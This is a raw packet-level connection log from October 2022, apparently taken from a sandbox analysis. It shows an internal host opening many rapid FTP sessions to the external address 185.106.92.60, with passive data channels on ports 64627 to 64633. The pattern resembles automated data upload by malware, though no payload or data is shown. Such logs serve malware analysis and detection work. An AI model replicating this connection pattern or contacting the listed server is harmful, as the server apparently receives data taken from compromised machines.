                                                                                                                                    Oct 10, 2022 06:03:06.129009008 CEST4989921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.167710066 CEST2149899185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:06.167938948 CEST4989921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.710732937 CEST4989921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.736407042 CEST2149899185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:06.736557007 CEST4989921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.740475893 CEST4989921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.767494917 CEST2149899185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:06.767739058 CEST4989921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.812174082 CEST4990064627192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.835401058 CEST6462749900185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:06.835525990 CEST4990064627192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.835763931 CEST4989921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.860941887 CEST2149899185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:06.861072063 CEST4989921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.861680031 CEST4990064627192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.884658098 CEST6462749900185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:06.884682894 CEST6462749900185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:06.884934902 CEST4990064627192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.887872934 CEST2149899185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:06.888065100 CEST4989921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.915224075 CEST4989921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:06.941447020 CEST2149899185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:06.941468954 CEST2149899185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:06.941684961 CEST4989921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.141133070 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.164470911 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:07.164638042 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.190545082 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:07.190578938 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:07.190592051 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:07.190747976 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.190747976 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.823195934 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.846781969 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:07.846931934 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.851780891 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.874836922 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:07.875082016 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.911576986 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.935074091 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:07.935190916 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.945804119 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.969727039 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:07.970016956 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:07.983813047 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.006859064 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.006989002 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.008120060 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.031495094 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.031683922 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.034569979 CEST4990264628192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.061302900 CEST6462849902185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.061638117 CEST4990264628192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.084952116 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.108634949 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.108879089 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.109188080 CEST4990264628192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.134666920 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.134771109 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.135938883 CEST6462849902185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.135956049 CEST6462849902185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.136054039 CEST4990264628192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.136782885 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.159403086 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.159451008 CEST2149901185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.159603119 CEST4990121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.323555946 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.347656965 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.347768068 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.375755072 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.375777006 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.375788927 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.375865936 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.375865936 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.377460003 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.401446104 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.401582003 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.401823997 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.426219940 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.426321983 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.426731110 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.451396942 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.451493025 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.451653004 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.476433992 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.476545095 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.477454901 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.502537012 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.502937078 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.503546953 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.528577089 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.528974056 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.538192034 CEST4990464629192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.560795069 CEST6462949904185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.560892105 CEST4990464629192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.561155081 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.622764111 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.623321056 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.624180079 CEST4990464629192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.646718025 CEST6462949904185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.646822929 CEST6462949904185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.646989107 CEST4990464629192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.647306919 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.649455070 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.649674892 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.673695087 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.673753023 CEST2149903185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.674105883 CEST4990321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.788353920 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.814063072 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.814287901 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.847857952 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.847877026 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.847887993 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.847980022 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.857614040 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.883852959 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.887310028 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.887481928 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.913006067 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.915275097 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.915435076 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.940618992 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.943367958 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.943497896 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.969016075 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.969142914 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.969559908 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.994038105 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:08.994235039 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:08.996270895 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.022347927 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.022622108 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.022937059 CEST4990664630192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.046008110 CEST6463049906185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.046225071 CEST4990664630192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.047019958 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.072267056 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.073503017 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.074963093 CEST4990664630192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.097750902 CEST6463049906185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.097896099 CEST6463049906185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.097981930 CEST4990664630192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.101145029 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.101243019 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.101370096 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.126763105 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.126951933 CEST2149905185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.127219915 CEST4990521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.263511896 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.286665916 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.286798000 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.313208103 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.313231945 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.313321114 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.313441992 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.313494921 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.313622952 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.337136030 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.337363958 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.337618113 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.360857010 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.361397982 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.361752987 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.385534048 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.388688087 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.396229029 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.419739008 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.421406031 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.421785116 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.444751978 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.445410967 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.447005033 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.470237017 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.475378990 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.475728989 CEST4990864631192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.499830961 CEST6463149908185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.502362967 CEST4990864631192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.506156921 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.529721975 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.535346985 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.535957098 CEST4990864631192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.560669899 CEST6463149908185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.563735008 CEST6463149908185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.564240932 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.564450026 CEST4990864631192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.564481974 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.564599037 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.587343931 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.587363958 CEST2149907185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.587549925 CEST4990721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.703905106 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.729995012 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.730216980 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.761024952 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.761157990 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.761955976 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.762048960 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.762592077 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.762700081 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.763518095 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.789005995 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.789253950 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.789453030 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.814951897 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.815227032 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.815520048 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.842941046 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.843075037 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.846822023 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.873923063 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.874044895 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.874479055 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.900857925 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.901103020 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.901938915 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.930223942 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.930485964 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.931288004 CEST4991064633192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.953931093 CEST6463349910185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.954051018 CEST4991064633192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.954366922 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.985192060 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:09.985306025 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:09.985811949 CEST4991064633192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.008511066 CEST6463349910185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.008560896 CEST6463349910185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.008738995 CEST4991064633192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.010093927 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.010246038 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.010409117 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.035507917 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.035558939 CEST2149909185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.035718918 CEST4990921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.149539948 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.172347069 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.172487020 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.198632002 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.198688030 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.198829889 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.198829889 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.199301958 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.199368954 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.199464083 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.222392082 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.222517014 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.222668886 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.245559931 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.245698929 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.245881081 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.269043922 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.269318104 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.269486904 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.292716026 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.292876959 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.293369055 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.317441940 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.317605019 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.319741964 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.343127966 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.343355894 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.343871117 CEST4991264633192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.368650913 CEST6463349912185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.369121075 CEST4991264633192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.371814013 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.395715952 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.395859957 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.396943092 CEST4991264633192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.422799110 CEST6463349912185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.426472902 CEST6463349912185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.426678896 CEST4991264633192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.426841974 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.426933050 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.427181959 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.449580908 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.449621916 CEST2149911185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.449759960 CEST4991121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.583476067 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.606398106 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.606528997 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.633044004 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.633095026 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.633244991 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.633249044 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.633326054 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.633579969 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.656743050 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.656919003 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.657192945 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.680694103 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.680953979 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.681225061 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.708122969 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.708404064 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.708537102 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.731864929 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.731967926 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.732419014 CEST4991321192.168.2.3185.106.92.60
